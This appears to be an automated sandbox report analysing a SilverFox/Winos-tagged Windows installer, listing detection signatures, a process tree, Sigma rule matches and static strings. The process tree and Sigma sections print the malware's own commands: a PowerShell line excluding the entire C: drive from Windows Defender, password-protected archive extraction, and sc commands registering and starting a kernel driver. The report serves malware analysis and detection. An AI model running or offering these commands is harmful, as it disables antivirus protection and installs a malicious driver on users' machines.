Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.6.exe

Overview

General Information

Sample name:	#U5b89#U88c5#U52a9#U624b_2.0.6.exe renamed because original name is a hash value
Original sample name:	_2.0.6.exe
Analysis ID:	1579778
MD5:	2fab10855efc0dc62a255ff1e6ec8fa6
SHA1:	0d69a4ea968d50370ee5f7d6e78252f5f61b75f5
SHA256:	869de4431ad5ea6b7513c3e12ff32ecd8b0e93e33c5ab6e3de7bf90de55edc23
Tags:	exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to hide a thread from the debugger

Found driver which could be used to inject code into processes

Hides threads from debuggers

Loading BitLocker PowerShell Module

PE file contains section with special chars

Protects its processes via BreakOnTermination flag

Query firmware table information (likely to detect VMs)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: New Kernel Driver Via SC.EXE

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

#U5b89#U88c5#U52a9#U624b_2.0.6.exe (PID: 6300 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" MD5: 2FAB10855EFC0DC62A255FF1E6EC8FA6)

#U5b89#U88c5#U52a9#U624b_2.0.6.tmp (PID: 4288 cmdline: "C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20432,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)

powershell.exe (PID: 2520 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6412 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

#U5b89#U88c5#U52a9#U624b_2.0.6.exe (PID: 5856 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT MD5: 2FAB10855EFC0DC62A255FF1E6EC8FA6)

#U5b89#U88c5#U52a9#U624b_2.0.6.tmp (PID: 4284 cmdline: "C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20442,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)

7zr.exe (PID: 7160 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)

conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

7zr.exe (PID: 1264 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)

conhost.exe (PID: 5792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7160 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 3608 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 984 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 768 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 3292 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2072 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 3160 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 2452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1020 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6004 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 7140 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2804 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 2380 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7056 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1472 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2452 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 6612 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1868 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1440 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 3396 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 344 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7100 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 6204 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1600 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 4592 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3304 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 5728 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2452 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 5996 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 4324 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6844 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 5692 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1532 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 6500 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5148 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 6472 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3876 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 3056 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2284 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1272 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4288 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 5996 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1440 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 5880 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5148 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 2072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3628 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 3656 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3056 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 7092 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4288 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 2212 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5996 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 940 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4352 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 6496 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7056 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 2704 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 6644 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5744 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cleanup

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20432,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, ParentProcessId: 4288, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2520, ProcessName: powershell.exe

Sigma detected: New Kernel Driver Via SC.EXE

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 984, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 768, ProcessName: sc.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 984, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 768, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20432,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, ParentProcessId: 4288, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2520, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe

Virustotal: Detection: 6%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 83.1% probability

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2140314078.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2140505560.0000000001240000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA1AEC0 FindFirstFileA,FindClose,		6_2_6CA1AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00AF6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,		10_2_00AF6868

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_00AF7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,

10_2_00AF7496

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
